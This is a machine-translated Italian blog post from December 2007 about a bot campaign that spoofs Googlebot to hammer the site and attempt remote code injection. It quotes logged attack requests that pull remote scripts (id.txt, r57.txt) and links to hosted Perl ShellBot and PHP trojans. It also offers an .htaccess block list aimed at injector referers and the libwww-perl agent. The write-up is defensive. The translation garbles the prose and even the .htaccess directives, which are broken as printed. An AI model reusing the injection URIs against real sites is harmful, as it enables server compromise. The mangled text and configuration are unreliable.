Per questo ultimi tre giorni questo blog è sofferenza attacco DoS. L'attacco è ancora vivo ora non credo che lascerà ancora. I cant vietato questo bot direttamente come sono stati l'invio di creare dei pacchetti (packet spoofing) come googlebot http://www.whois-search.com/whois/64.233.166.136. Im ancora cercando il diritto provider di servizi Internet.
OrgName: Google Inc OrgID: GOGL Indirizzo: 1600 Amphitheatre Parkway Città: Mountain View StateProv: CA PostalCode: 94043 Paese: Stati UnitiAl momento ho bloccato tutti i flussi di distanza dal loro casuale ospitante *. com e "perl bot firma", ma il blocco non si fermerà da martellare questo sito. Sarò l'invio di 503 (Servizio non disponibile), relativa a talune richiesta così se hai problemi di accesso di questo sito si prega di controllare più tardi.
Tipo di iniezioni
Non vi è molto uri parametro nel mio log (mi disabili log dei server - limite di risorse) che, probabilmente, ha una grande inventari check-elenchi di vulnerabilità note CMS. Non posso che confermare che la sua blackhat seo uno spam bot come URI della richiesta comprendono la tipica order.php pagina.
/ es / wordpress / how-to-rimosso-wordpress-net-in-spam-iniezione-infetti-di-mike-ja gger-goro-class-mailphp/order.php /? wp = http://hom3.t35 .com / xpl / hack / id.txt? / es / wordpress / order.php /? wp = http://hom3.t35.com/xpl/hack/id.txt? / order.php? wp = http://hom3.t35.com/xpl/hack/id.txt?
Per visualizzare la seguente fonte avete bisogno di escludere il sito web ospitante dal tuo programma antivirus.
- Perl / ShellBot.B Trojan - http://hom3.t35.com/xpl/fidz/hack/bnc.txt
- PHP / Rst.S Trojan - http://hom3.t35.com/xpl/fidz
htaccess bloccato cattiva Codice Iniettore e Perl Bot (Botnet)
Se si ha problemi simili. si dovrebbe bloccare la seguente nel tuo dominio htaccess.
mod_setenvifSetEnvIfNoCase Referer "^ http:// (www.)? T35 \. It" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Jorgevolio \. It" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? emabe \. it "codeinjector_ref = 1 SetEnvIfNoCase Referer" ^ http:// (www.)? pawang \. "codeinjector_ref = 1 SetEnvIfNoCase Referer" ^ http:// (www.)? GW-oro \. net "codeinjector_ref = 1 SetEnvIfNoCase User-Agent" ^ libwww-perl * "shell_bots = 1 SetEnvIfNoCase User-Agent" ^ Amidalla * "shell_bots = 1 <FilesMatch "(.*)"> Ordine Consenti, Nega Consenti da tutti i Nega da env = codeinjector_ref Nega da env = shell_bots </ FilesMatch>e se aren't sicuro se il supporto per il server mod_setenvif avvolge come l'esempio qui di seguito.
<IfModule Mod_setenvif.c> # ... sostituire questa linea con il codice sopra ... </ IfModule>
Come trappola Perl Shell Bot
Abbiamo bisogno di un modello di trappola a questo bot. certamente sapevamo che questi bot:
- non fa onore robot.txt
- essi la scansione di tutti i sottodirectory
- essi ha un motivo in notazione URI richiesta
Per ora ho solo creare sottodirectory per auto-divieto (e alcune altre cose) in base al loro modello. Alexa bot saranno vietate in quanto troppo onore non robot.txt.
I'll be aggiornare questo post di volta in volta. Di verificare i relativi articoli su come pacchetto spoofing e convalidare fucina / spoofing pacchetto.
Scan & recente aggiornamento
Qui di seguito la lista è aggiunto automaticamente.
- 24 dicembre 2007
- IP: 64.26.63.10 param: login =,? iniettare: http://pawang.in/r57.txt
- 24 dicembre 2007
- IP: 64.26.63.10 param: dir =, login = iniettare: http://pawang.in/r57.txt?
- 25 dicembre 2007
- IP: 59.158.128.138 param: p =,: = iniettare allinurl: http://gw-gold.net/jpg/pictures/test.txt
Risorse esterne
- 21 dicembre 2007 a 10:48 pm
- 16 febbraio 2008, 3:05 am
- 0,3
- URL
Nessun Commento a "Messa da remoto di codice di iniezione come Googlebot - Packet Spoofing Perl & Trojan bot"
Trackback URL: Utilizzare il TrackBack url ↑ di eseguire il ping di questo articolo. Se il tuo blog non supporta Trackbacks si potrebbe desiderare di lasciare un commento.
"scrivere come se si tratta di un buon amico (di fronte a tua madre)."
. esprimere la tua opinione
Disclaimer: Per qualsiasi contenuto che si posta, si dichiara a concedere Kakkoi il titolo gratuito, irrevocabile, perpetuo, esclusivo e pienamente licenza di utilizzare, riprodurre, modificare, adattare, pubblicare, tradurre, creare opere derivate, distribuire, eseguire e visualizzare tali contenuti in tutto o in parte, a livello mondiale e ad inserire in altre opere, in qualsiasi forma, media o tecnologia attualmente conosciuta o sviluppata successivamente. Alcuni diritti riservati.
Il seguente "Codice" hanno lo scopo di proteggere gli utenti di questo sito.
Al fine di mantenere queste esperienze piacevole e interessante per tutti i nostri utenti, ti chiediamo di seguire le guidlines sopra.
essere il primo a commentare.